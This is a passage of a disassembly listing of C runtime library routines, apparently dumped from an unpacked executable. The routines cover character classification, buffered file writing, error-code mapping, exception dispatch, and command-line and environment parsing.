loc_41EC78: ; CODE XREF: sub_41EB6C+127�j
mov ds:byte_48B460[eax], dl
jmp short loc_41EC9C
; ---------------------------------------------------------------------------
loc_41EC80: ; CODE XREF: sub_41EB6C+FC�j
test dl, 2
jz short loc_41EC95
or ds:byte_48B561[eax], 20h
mov dl, [ebp+eax+var_314]
jmp short loc_41EC78
; ---------------------------------------------------------------------------
loc_41EC95: ; CODE XREF: sub_41EB6C+117�j
and ds:byte_48B460[eax], 0
loc_41EC9C: ; CODE XREF: sub_41EB6C+112�j
inc eax
inc ecx
inc ecx
cmp eax, esi
jb short loc_41EC62
jmp short loc_41ECEE
; ---------------------------------------------------------------------------
loc_41ECA5: ; CODE XREF: sub_41EB6C+1D�j
xor eax, eax
mov esi, 100h
loc_41ECAC: ; CODE XREF: sub_41EB6C+180�j
cmp eax, 41h
jb short loc_41ECCA
cmp eax, 5Ah
ja short loc_41ECCA
or ds:byte_48B561[eax], 10h
mov cl, al
add cl, 20h
loc_41ECC2: ; CODE XREF: sub_41EB6C+174�j
mov ds:byte_48B460[eax], cl
jmp short loc_41ECE9
; ---------------------------------------------------------------------------
loc_41ECCA: ; CODE XREF: sub_41EB6C+143�j
; sub_41EB6C+148�j
cmp eax, 61h
jb short loc_41ECE2
cmp eax, 7Ah
ja short loc_41ECE2
or ds:byte_48B561[eax], 20h
mov cl, al
sub cl, 20h
jmp short loc_41ECC2
; ---------------------------------------------------------------------------
loc_41ECE2: ; CODE XREF: sub_41EB6C+161�j
; sub_41EB6C+166�j
and ds:byte_48B460[eax], 0
loc_41ECE9: ; CODE XREF: sub_41EB6C+15C�j
inc eax
cmp eax, esi
jb short loc_41ECAC
loc_41ECEE: ; CODE XREF: sub_41EB6C+137�j
pop esi
leave
retn
sub_41EB6C endp
; =============== S U B R O U T I N E =======================================
sub_41ECF1 proc near ; CODE XREF: sub_41F12F+9�p
; sub_41F187+D�p ...
cmp ds:dword_48B694, 0
jnz short locret_41ED0C
push 0FFFFFFFDh
call sub_41E92D
pop ecx
mov ds:dword_48B694, 1
locret_41ED0C: ; CODE XREF: sub_41ECF1+7�j
retn
sub_41ECF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ED0D proc near ; CODE XREF: sub_4192B8+2B�p
; sub_4192B8+A6�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp ds:dword_48B45C, 0
push edi
mov edi, [ebp+arg_0]
mov [ebp+arg_0], edi
jnz short loc_41ED31
push [ebp+arg_8]
push [ebp+arg_4]
push edi
call sub_418C10
add esp, 0Ch
jmp short loc_41ED94
; ---------------------------------------------------------------------------
loc_41ED31: ; CODE XREF: sub_41ED0D+11�j
mov edx, [ebp+arg_8]
push esi
test edx, edx
jz short loc_41ED76
mov ecx, [ebp+arg_4]
loc_41ED3C: ; CODE XREF: sub_41ED0D+5B�j
mov al, [ecx]
dec edx
movzx esi, al
test ds:byte_48B561[esi], 4
mov [edi], al
jz short loc_41ED60
inc edi
inc ecx
test edx, edx
jz short loc_41ED6C
mov al, [ecx]
dec edx
mov [edi], al
inc edi
inc ecx
test al, al
jz short loc_41ED72
jmp short loc_41ED66
; ---------------------------------------------------------------------------
loc_41ED60: ; CODE XREF: sub_41ED0D+3E�j
inc edi
inc ecx
test al, al
jz short loc_41ED76
loc_41ED66: ; CODE XREF: sub_41ED0D+51�j
test edx, edx
jnz short loc_41ED3C
jmp short loc_41ED76
; ---------------------------------------------------------------------------
loc_41ED6C: ; CODE XREF: sub_41ED0D+44�j
and byte ptr [edi-1], 0
jmp short loc_41ED76
; ---------------------------------------------------------------------------
loc_41ED72: ; CODE XREF: sub_41ED0D+4F�j
and byte ptr [edi-2], 0
loc_41ED76: ; CODE XREF: sub_41ED0D+2A�j
; sub_41ED0D+57�j ...
mov eax, edx
dec edx
test eax, eax
pop esi
jz short loc_41ED91
lea ecx, [edx+1]
xor eax, eax
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
loc_41ED91: ; CODE XREF: sub_41ED0D+6F�j
mov eax, [ebp+arg_0]
loc_41ED94: ; CODE XREF: sub_41ED0D+22�j
pop edi
pop ebp
retn
sub_41ED0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ED97 proc near ; CODE XREF: sub_4196EF+A2�p
; sub_419D23+95�p ...
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
mov ecx, [ebp+arg_0]
push ebx
cmp ecx, ds:dword_48B440
push esi
push edi
jnb loc_41EF2B
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea ebx, ds:48B340h[eax*4]
shl esi, 3
mov eax, [ebx]
mov al, [eax+esi+4]
test al, 1
jz loc_41EF2B
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_41EDE8
loc_41EDE1: ; CODE XREF: sub_41ED97+177�j
xor eax, eax
jmp loc_41EF3F
; ---------------------------------------------------------------------------
loc_41EDE8: ; CODE XREF: sub_41ED97+48�j
test al, 20h
jz short loc_41EDF8
push 2
push edi
push ecx
call sub_41E517
add esp, 0Ch
loc_41EDF8: ; CODE XREF: sub_41ED97+53�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_41EEC7
mov eax, [ebp+arg_4]
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_41EEFF
loc_41EE18: ; CODE XREF: sub_41ED97+F5�j
lea eax, [ebp+var_414]
loc_41EE1E: ; CODE XREF: sub_41ED97+B9�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_41EE52
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_41EE3D
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_41EE3D: ; CODE XREF: sub_41ED97+9D�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jl short loc_41EE1E
loc_41EE52: ; CODE XREF: sub_41ED97+90�j
mov edi, eax
lea eax, [ebp+var_414]
sub edi, eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_414]
push edi
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:dword_42407C ; WriteFile
test eax, eax
jz short loc_41EEBC
mov eax, [ebp+var_C]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_41EE8E
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jb short loc_41EE18
loc_41EE8E: ; CODE XREF: sub_41ED97+EA�j
; sub_41ED97+12E�j
xor edi, edi
loc_41EE90: ; CODE XREF: sub_41ED97+150�j
; sub_41ED97+15B�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_41EF26
cmp [ebp+arg_0], edi
jz short loc_41EEFF
push 5
pop eax
cmp [ebp+arg_0], eax
jnz short loc_41EEF4
mov ds:dword_48A014, 9
mov ds:dword_48A018, eax
jmp loc_41EF3C
; ---------------------------------------------------------------------------
loc_41EEBC: ; CODE XREF: sub_41ED97+E0�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_41EE8E
; ---------------------------------------------------------------------------
loc_41EEC7: ; CODE XREF: sub_41ED97+69�j
lea ecx, [ebp+var_C]
push edi
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call ds:dword_42407C ; WriteFile
test eax, eax
jz short loc_41EEE9
mov eax, [ebp+var_C]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_41EE90
; ---------------------------------------------------------------------------
loc_41EEE9: ; CODE XREF: sub_41ED97+145�j
call ds:dword_42408C ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_41EE90
; ---------------------------------------------------------------------------
loc_41EEF4: ; CODE XREF: sub_41ED97+10F�j
push [ebp+arg_0]
call sub_41EF44
pop ecx
jmp short loc_41EF3C
; ---------------------------------------------------------------------------
loc_41EEFF: ; CODE XREF: sub_41ED97+7B�j
; sub_41ED97+107�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_41EF14
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_41EDE1
loc_41EF14: ; CODE XREF: sub_41ED97+16F�j
mov ds:dword_48A014, 1Ch
mov ds:dword_48A018, edi
jmp short loc_41EF3C
; ---------------------------------------------------------------------------
loc_41EF26: ; CODE XREF: sub_41ED97+FE�j
sub eax, [ebp+var_10]
jmp short loc_41EF3F
; ---------------------------------------------------------------------------
loc_41EF2B: ; CODE XREF: sub_41ED97+15�j
; sub_41ED97+37�j
and ds:dword_48A018, 0
mov ds:dword_48A014, 9
loc_41EF3C: ; CODE XREF: sub_41ED97+120�j
; sub_41ED97+166�j ...
or eax, 0FFFFFFFFh
loc_41EF3F: ; CODE XREF: sub_41ED97+4C�j
; sub_41ED97+192�j
pop edi
pop esi
pop ebx
leave
retn
sub_41ED97 endp
; =============== S U B R O U T I N E =======================================
sub_41EF44 proc near ; CODE XREF: sub_4197F9+16�p
; sub_419BBA+1D�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor edx, edx
mov ds:dword_48A018, ecx
mov eax, offset dword_43BA30
loc_41EF55: ; CODE XREF: sub_41EF44+1E�j
cmp ecx, [eax]
jz short loc_41EF79
add eax, 8
inc edx
cmp eax, offset dword_43BB98
jl short loc_41EF55
cmp ecx, 13h
jb short loc_41EF86
cmp ecx, 24h
ja short loc_41EF86
mov ds:dword_48A014, 0Dh
retn
; ---------------------------------------------------------------------------
loc_41EF79: ; CODE XREF: sub_41EF44+13�j
mov eax, ds:dword_43BA34[edx*8]
mov ds:dword_48A014, eax
retn
; ---------------------------------------------------------------------------
loc_41EF86: ; CODE XREF: sub_41EF44+23�j
; sub_41EF44+28�j
cmp ecx, 0BCh
jb short loc_41EFA0
cmp ecx, 0CAh
mov ds:dword_48A014, 8
jbe short locret_41EFAA
loc_41EFA0: ; CODE XREF: sub_41EF44+48�j
mov ds:dword_48A014, 16h
locret_41EFAA: ; CODE XREF: sub_41EF44+5A�j
retn
sub_41EF44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EFAB proc near ; CODE XREF: _0:00419CC7�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_41F0EC
test eax, eax
pop ecx
jz loc_41F0E0
mov ebx, [eax+8]
test ebx, ebx
jz loc_41F0E0
cmp ebx, 5
jnz short loc_41EFDC
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_41F0E9
; ---------------------------------------------------------------------------
loc_41EFDC: ; CODE XREF: sub_41EFAB+23�j
cmp ebx, 1
jz loc_41F0DB
mov ecx, ds:dword_48A0C8
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov ds:dword_48A0C8, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_41F0CB
mov ecx, ds:dword_43BC10
mov edx, ds:dword_43BC14
add edx, ecx
push esi
cmp ecx, edx
jge short loc_41F02B
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:43BBA0h[esi*4]
loc_41F022: ; CODE XREF: sub_41EFAB+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_41F022
loc_41F02B: ; CODE XREF: sub_41EFAB+69�j
mov eax, [eax]
mov esi, ds:dword_43BC1C
cmp eax, 0C000008Eh
jnz short loc_41F046
mov ds:dword_43BC1C, 83h
jmp short loc_41F0B6
; ---------------------------------------------------------------------------
loc_41F046: ; CODE XREF: sub_41EFAB+8D�j
cmp eax, 0C0000090h
jnz short loc_41F059
mov ds:dword_43BC1C, 81h
jmp short loc_41F0B6
; ---------------------------------------------------------------------------
loc_41F059: ; CODE XREF: sub_41EFAB+A0�j
cmp eax, 0C0000091h
jnz short loc_41F06C
mov ds:dword_43BC1C, 84h
jmp short loc_41F0B6
; ---------------------------------------------------------------------------
loc_41F06C: ; CODE XREF: sub_41EFAB+B3�j
cmp eax, 0C0000093h
jnz short loc_41F07F
mov ds:dword_43BC1C, 85h
jmp short loc_41F0B6
; ---------------------------------------------------------------------------
loc_41F07F: ; CODE XREF: sub_41EFAB+C6�j
cmp eax, 0C000008Dh
jnz short loc_41F092
mov ds:dword_43BC1C, 82h
jmp short loc_41F0B6
; ---------------------------------------------------------------------------
loc_41F092: ; CODE XREF: sub_41EFAB+D9�j
cmp eax, 0C000008Fh
jnz short loc_41F0A5
mov ds:dword_43BC1C, 86h
jmp short loc_41F0B6
; ---------------------------------------------------------------------------
loc_41F0A5: ; CODE XREF: sub_41EFAB+EC�j
cmp eax, 0C0000092h
jnz short loc_41F0B6
mov ds:dword_43BC1C, 8Ah
loc_41F0B6: ; CODE XREF: sub_41EFAB+99�j
; sub_41EFAB+AC�j ...
push ds:dword_43BC1C
push 8
call ebx
pop ecx
mov ds:dword_43BC1C, esi
pop ecx
pop esi
jmp short loc_41F0D3
; ---------------------------------------------------------------------------
loc_41F0CB: ; CODE XREF: sub_41EFAB+52�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_41F0D3: ; CODE XREF: sub_41EFAB+11E�j
mov eax, [ebp+arg_0]
mov ds:dword_48A0C8, eax
loc_41F0DB: ; CODE XREF: sub_41EFAB+34�j
or eax, 0FFFFFFFFh
jmp short loc_41F0E9
; ---------------------------------------------------------------------------
loc_41F0E0: ; CODE XREF: sub_41EFAB+F�j
; sub_41EFAB+1A�j
push [ebp+arg_4]
call ds:dword_42404C ; UnhandledExceptionFilter
loc_41F0E9: ; CODE XREF: sub_41EFAB+2C�j
; sub_41EFAB+133�j
pop ebx
pop ebp
retn
sub_41EFAB endp
; =============== S U B R O U T I N E =======================================
sub_41F0EC proc near ; CODE XREF: sub_41EFAB+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, ds:dword_43BC18
cmp ds:dword_43BB98, edx
push esi
mov eax, offset dword_43BB98
jz short loc_41F119
lea esi, [ecx+ecx*2]
lea esi, ds:43BB98h[esi*4]
loc_41F10E: ; CODE XREF: sub_41F0EC+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_41F119
cmp [eax], edx
jnz short loc_41F10E
loc_41F119: ; CODE XREF: sub_41F0EC+16�j
; sub_41F0EC+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:43BB98h[ecx*4]
cmp eax, ecx
jnb short loc_41F12C
cmp [eax], edx
jz short locret_41F12E
loc_41F12C: ; CODE XREF: sub_41F0EC+3A�j
xor eax, eax
locret_41F12E: ; CODE XREF: sub_41F0EC+3E�j
retn
sub_41F0EC endp
; =============== S U B R O U T I N E =======================================
sub_41F12F proc near ; CODE XREF: _0:00419C89�p
cmp ds:dword_48B694, 0
jnz short loc_41F13D
call sub_41ECF1
loc_41F13D: ; CODE XREF: sub_41F12F+7�j
push esi
mov esi, ds:dword_48B68C
mov al, [esi]
cmp al, 22h
jnz short loc_41F16F
loc_41F14A: ; CODE XREF: sub_41F12F+33�j
; sub_41F12F+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_41F167
test al, al
jz short loc_41F167
movzx eax, al
push eax
call sub_42101D
test eax, eax
pop ecx
jz short loc_41F14A
inc esi
jmp short loc_41F14A
; ---------------------------------------------------------------------------
loc_41F167: ; CODE XREF: sub_41F12F+21�j
; sub_41F12F+25�j
cmp byte ptr [esi], 22h
jnz short loc_41F179
loc_41F16C: ; CODE XREF: sub_41F12F+52�j
inc esi
jmp short loc_41F179
; ---------------------------------------------------------------------------
loc_41F16F: ; CODE XREF: sub_41F12F+19�j
cmp al, 20h
jbe short loc_41F179
loc_41F173: ; CODE XREF: sub_41F12F+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_41F173
loc_41F179: ; CODE XREF: sub_41F12F+3B�j
; sub_41F12F+3E�j ...
mov al, [esi]
test al, al
jz short loc_41F183
cmp al, 20h
jbe short loc_41F16C
loc_41F183: ; CODE XREF: sub_41F12F+4E�j
mov eax, esi
pop esi
retn
sub_41F12F endp
; =============== S U B R O U T I N E =======================================
sub_41F187 proc near ; CODE XREF: _0:00419C72�p
push ebx
xor ebx, ebx
cmp ds:dword_48B694, ebx
push esi
push edi
jnz short loc_41F199
call sub_41ECF1
loc_41F199: ; CODE XREF: sub_41F187+B�j
mov esi, ds:dword_48A060
xor edi, edi
loc_41F1A1: ; CODE XREF: sub_41F187+30�j
mov al, [esi]
cmp al, bl
jz short loc_41F1B9
cmp al, 3Dh
jz short loc_41F1AC
inc edi
loc_41F1AC: ; CODE XREF: sub_41F187+22�j
push esi
call sub_417AB0
pop ecx
lea esi, [esi+eax+1]
jmp short loc_41F1A1
; ---------------------------------------------------------------------------
loc_41F1B9: ; CODE XREF: sub_41F187+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_417B89
mov esi, eax
pop ecx
cmp esi, ebx
mov ds:dword_48A03C, esi
jnz short loc_41F1DB
push 9
call sub_419CDA
pop ecx
loc_41F1DB: ; CODE XREF: sub_41F187+4A�j
mov edi, ds:dword_48A060
cmp [edi], bl
jz short loc_41F21E
push ebp
loc_41F1E6: ; CODE XREF: sub_41F187+94�j
push edi
call sub_417AB0
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_41F217
push ebp
call sub_417B89
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_41F20A
push 9
call sub_419CDA
pop ecx
loc_41F20A: ; CODE XREF: sub_41F187+79�j
push edi
push dword ptr [esi]
call sub_4179C0
pop ecx
add esi, 4
pop ecx
loc_41F217: ; CODE XREF: sub_41F187+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_41F1E6
pop ebp
loc_41F21E: ; CODE XREF: sub_41F187+5C�j
push ds:dword_48A060
call sub_417C3B
pop ecx
mov ds:dword_48A060, ebx
mov [esi], ebx
pop edi
pop esi
mov ds:dword_48B690, 1
pop ebx
retn
sub_41F187 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F240 proc near ; CODE XREF: _0:00419C6D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp ds:dword_48B694, ebx
push esi
push edi
jnz short loc_41F257
call sub_41ECF1
loc_41F257: ; CODE XREF: sub_41F240+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call ds:off_424094
mov eax, ds:dword_48B68C
mov ds:off_48A04C, esi
mov edi, esi
cmp [eax], bl
jz short loc_41F27C
mov edi, eax
loc_41F27C: ; CODE XREF: sub_41F240+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_41F2D9
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_417B89
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_41F2AC
push 8
call sub_419CDA
pop ecx
loc_41F2AC: ; CODE XREF: sub_41F240+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_41F2D9
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov ds:dword_48A034, esi
pop edi
pop esi
mov ds:dword_48A030, eax
pop ebx
leave
retn
sub_41F240 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F2D9 proc near ; CODE XREF: sub_41F240+47�p
; sub_41F240+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_41F303
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_41F303: ; CODE XREF: sub_41F2D9+20�j
cmp byte ptr [eax], 22h
jnz short loc_41F34C
loc_41F308: ; CODE XREF: sub_41F2D9+58�j
; sub_41F2D9+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_41F33A
test dl, dl
jz short loc_41F33A
movzx edx, dl
test ds:byte_48B561[edx], 4
jz short loc_41F32D
inc dword ptr [ecx]
test esi, esi
jz short loc_41F32D
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_41F32D: ; CODE XREF: sub_41F2D9+46�j
; sub_41F2D9+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41F308
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_41F308
; ---------------------------------------------------------------------------
loc_41F33A: ; CODE XREF: sub_41F2D9+36�j
; sub_41F2D9+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41F344
and byte ptr [esi], 0
inc esi
loc_41F344: ; CODE XREF: sub_41F2D9+65�j
cmp byte ptr [eax], 22h
jnz short loc_41F38F
inc eax
jmp short loc_41F38F
; ---------------------------------------------------------------------------
loc_41F34C: ; CODE XREF: sub_41F2D9+2D�j
; sub_41F2D9+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41F357
mov dl, [eax]
mov [esi], dl
inc esi
loc_41F357: ; CODE XREF: sub_41F2D9+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test ds:byte_48B561[ebx], 4
jz short loc_41F372
inc dword ptr [ecx]
test esi, esi
jz short loc_41F371
mov bl, [eax]
mov [esi], bl
inc esi
loc_41F371: ; CODE XREF: sub_41F2D9+91�j
inc eax
loc_41F372: ; CODE XREF: sub_41F2D9+8B�j
cmp dl, 20h
jz short loc_41F380
test dl, dl
jz short loc_41F384
cmp dl, 9
jnz short loc_41F34C
loc_41F380: ; CODE XREF: sub_41F2D9+9C�j
test dl, dl
jnz short loc_41F387
loc_41F384: ; CODE XREF: sub_41F2D9+A0�j
dec eax
jmp short loc_41F38F
; ---------------------------------------------------------------------------
loc_41F387: ; CODE XREF: sub_41F2D9+A9�j
test esi, esi
jz short loc_41F38F
and byte ptr [esi-1], 0
loc_41F38F: ; CODE XREF: sub_41F2D9+6E�j
; sub_41F2D9+71�j ...
and [ebp+arg_10], 0
loc_41F393: ; CODE XREF: sub_41F2D9+19E�j
cmp byte ptr [eax], 0
jz loc_41F47C
loc_41F39C: ; CODE XREF: sub_41F2D9+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_41F3A8
cmp dl, 9
jnz short loc_41F3AB
loc_41F3A8: ; CODE XREF: sub_41F2D9+C8�j
inc eax
jmp short loc_41F39C
; ---------------------------------------------------------------------------
loc_41F3AB: ; CODE XREF: sub_41F2D9+CD�j
cmp byte ptr [eax], 0
jz loc_41F47C
test edi, edi
jz short loc_41F3C0
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_41F3C0: ; CODE XREF: sub_41F2D9+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_41F3C5: ; CODE XREF: sub_41F2D9+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_41F3CE: ; CODE XREF: sub_41F2D9+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_41F3D7
inc eax
inc ebx
jmp short loc_41F3CE
; ---------------------------------------------------------------------------
loc_41F3D7: ; CODE XREF: sub_41F2D9+F8�j
cmp byte ptr [eax], 22h
jnz short loc_41F408
test bl, 1
jnz short loc_41F406
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_41F3F5
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_41F3F5
mov eax, edx
jmp short loc_41F3F8
; ---------------------------------------------------------------------------
loc_41F3F5: ; CODE XREF: sub_41F2D9+10D�j
; sub_41F2D9+116�j
mov [ebp+arg_0], edi
loc_41F3F8: ; CODE XREF: sub_41F2D9+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_41F406: ; CODE XREF: sub_41F2D9+106�j
shr ebx, 1
loc_41F408: ; CODE XREF: sub_41F2D9+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_41F41D
inc ebx
loc_41F410: ; CODE XREF: sub_41F2D9+142�j
test esi, esi
jz short loc_41F418
mov byte ptr [esi], 5Ch
inc esi
loc_41F418: ; CODE XREF: sub_41F2D9+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_41F410
loc_41F41D: ; CODE XREF: sub_41F2D9+134�j
mov dl, [eax]
test dl, dl
jz short loc_41F46D
cmp [ebp+arg_10], 0
jnz short loc_41F433
cmp dl, 20h
jz short loc_41F46D
cmp dl, 9
jz short loc_41F46D
loc_41F433: ; CODE XREF: sub_41F2D9+14E�j
cmp [ebp+arg_0], 0
jz short loc_41F467
test esi, esi
jz short loc_41F456
movzx ebx, dl
test ds:byte_48B561[ebx], 4
jz short loc_41F44F
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_41F44F: ; CODE XREF: sub_41F2D9+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_41F465
; ---------------------------------------------------------------------------
loc_41F456: ; CODE XREF: sub_41F2D9+162�j
movzx edx, dl
test ds:byte_48B561[edx], 4
jz short loc_41F465
inc eax
inc dword ptr [ecx]
loc_41F465: ; CODE XREF: sub_41F2D9+17B�j
; sub_41F2D9+187�j
inc dword ptr [ecx]
loc_41F467: ; CODE XREF: sub_41F2D9+15E�j
inc eax
jmp loc_41F3C5
; ---------------------------------------------------------------------------
loc_41F46D: ; CODE XREF: sub_41F2D9+148�j
; sub_41F2D9+153�j ...
test esi, esi
jz short loc_41F475
and byte ptr [esi], 0
inc esi
loc_41F475: ; CODE XREF: sub_41F2D9+196�j
inc dword ptr [ecx]
jmp loc_41F393
; ---------------------------------------------------------------------------
loc_41F47C: ; CODE XREF: sub_41F2D9+BD�j
; sub_41F2D9+D5�j
test edi, edi
jz short loc_41F483
and dword ptr [edi], 0
loc_41F483: ; CODE XREF: sub_41F2D9+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_41F2D9 endp
; =============== S U B R O U T I N E =======================================
sub_41F48D proc near ; CODE XREF: _0:00419C63�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, ds:dword_48A1D0
push ebx
push ebp
mov ebp, ds:dword_42403C
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_41F4DB
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41F4BC
mov ds:dword_48A1D0, 1
jmp short loc_41F4E4
; ---------------------------------------------------------------------------
loc_41F4BC: ; CODE XREF: sub_41F48D+21�j
call ds:dword_424040 ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz loc_41F5B6
mov ds:dword_48A1D0, 2
jmp loc_41F56A
; ---------------------------------------------------------------------------
loc_41F4DB: ; CODE XREF: sub_41F48D+19�j
cmp eax, 1
jnz loc_41F565
loc_41F4E4: ; CODE XREF: sub_41F48D+2D�j
cmp esi, ebx
jnz short loc_41F4F4
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_41F5B6
loc_41F4F4: ; CODE XREF: sub_41F48D+59�j
cmp [esi], bx
mov eax, esi
jz short loc_41F509
loc_41F4FB: ; CODE XREF: sub_41F48D+73�j
; sub_41F48D+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_41F4FB
inc eax
inc eax
cmp [eax], bx
jnz short loc_41F4FB
loc_41F509: ; CODE XREF: sub_41F48D+6C�j
sub eax, esi
mov edi, ds:dword_424150
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_41F55A
push ebp
call sub_417B89
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_41F55A
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_41F556
push [esp+18h+var_8]
call sub_417C3B
pop ecx
mov [esp+18h+var_8], ebx
loc_41F556: ; CODE XREF: sub_41F48D+B9�j
mov ebx, [esp+18h+var_8]
loc_41F55A: ; CODE XREF: sub_41F48D+99�j
; sub_41F48D+A8�j
push esi
call ds:dword_424044 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_41F5B8
; ---------------------------------------------------------------------------
loc_41F565: ; CODE XREF: sub_41F48D+51�j
cmp eax, 2
jnz short loc_41F5B6
loc_41F56A: ; CODE XREF: sub_41F48D+49�j
cmp edi, ebx
jnz short loc_41F57A
call ds:dword_424040 ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz short loc_41F5B6
loc_41F57A: ; CODE XREF: sub_41F48D+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_41F58A
